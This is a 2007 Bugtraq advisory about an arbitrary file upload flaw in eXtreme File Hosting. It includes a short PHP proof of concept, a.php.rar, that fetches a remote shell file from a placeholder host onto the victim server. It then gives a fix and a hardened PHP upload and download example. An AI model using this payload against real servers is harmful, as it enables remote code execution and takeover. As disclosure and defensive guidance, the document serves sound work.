Message-ID: <20070209090823.23915.qmail@securityfocus.com>
Date: 9 Feb 2007 09:08:23 -0000
From: hamed.bazargani@...il.com
To: bugtraq@...urityfocus.com
Subject: eXtreme File Hosting remote file upload vulnerability

A security bug has been discovered in eXtreme File Hosting that lets an attacker upload arbitrary files to the server and obtain a shell with phpshell.

Bug: this PHP program lets users upload zip or rar files. An attacker can upload a file named a.php.rar that contains:

###########################
<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}
?> 
###########################

After uploading it, clicking the download link causes the file to be executed rather than downloaded.
Once a.php.rar has run, evile_file.php has been copied onto the victim host and the attacker can use it to compromise the server.


Solution: disable rar file uploading in the settings
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Software: eXtreme File Hosting
Site: http://www.extremepow.com
Reported By: hamed bazargani (hamed.bazargani@...il.com) from I.R.IRAN and all Iranian whitehat hackers
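The defect described above is an upload path that trusts the client-supplied file name and a download link that lets the server execute the stored file. As an added example (not eXtreme File Hosting's code), the following PHP shows the hardened counterpart: an extension allowlist that rejects double-extension names such as a.php.rar, a server-chosen storage name in a directory assumed to sit outside the web root, and a download handler that streams the file as an attachment instead of executing it. STORE_DIR and ALLOWED_EXT are assumed values.

```php
<?php
// Added example, not part of the original advisory or of eXtreme File Hosting.
declare(strict_types=1);

const STORE_DIR   = '/var/filehost/store';        // assumed: NOT under the document root
const ALLOWED_EXT = ['zip', 'txt', 'pdf', 'png'];  // assumed allowlist; 'rar' deliberately absent

/** Return a safe server-side name, or null if the client name must be rejected. */
function safeName(string $original): ?string {
    $parts = explode('.', strtolower(basename($original)));
    if (count($parts) < 2) {
        return null;                               // no extension at all
    }
    $last = array_pop($parts);
    if (!in_array($last, ALLOWED_EXT, true)) {
        return null;                               // final extension not on the allowlist
    }
    foreach ($parts as $p) {
        // Reject .php/.php5/.phtml/.phar anywhere in the name (a.php.rar, x.phtml.zip):
        // some web server setups honour every extension in a multi-dotted name.
        if (preg_match('/^ph(p\d?|tml|ar)$/', $p)) {
            return null;
        }
    }
    // The client-supplied name is never used on disk; the server picks a random one.
    return bin2hex(random_bytes(16)) . '.' . $last;
}

/** Validate and store one entry of $_FILES; returns the stored name. */
function handleUpload(array $f): string {
    if ($f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $name = safeName($f['name']);
    if ($name === null) {
        throw new RuntimeException('file type not allowed');
    }
    if (!move_uploaded_file($f['tmp_name'], STORE_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

/** Serve a stored file as an attachment: it is read and streamed, never included or run. */
function serveDownload(string $name): void {
    if (!preg_match('/^[0-9a-f]{32}\.[a-z0-9]+$/', $name)) { http_response_code(400); return; }
    $path = STORE_DIR . '/' . $name;
    if (!is_file($path)) { http_response_code(404); return; }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}
```

The storage directory should additionally be configured in the web server so that nothing in it is ever handed to the PHP interpreter; the name check above is a second layer, not a substitute for that.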
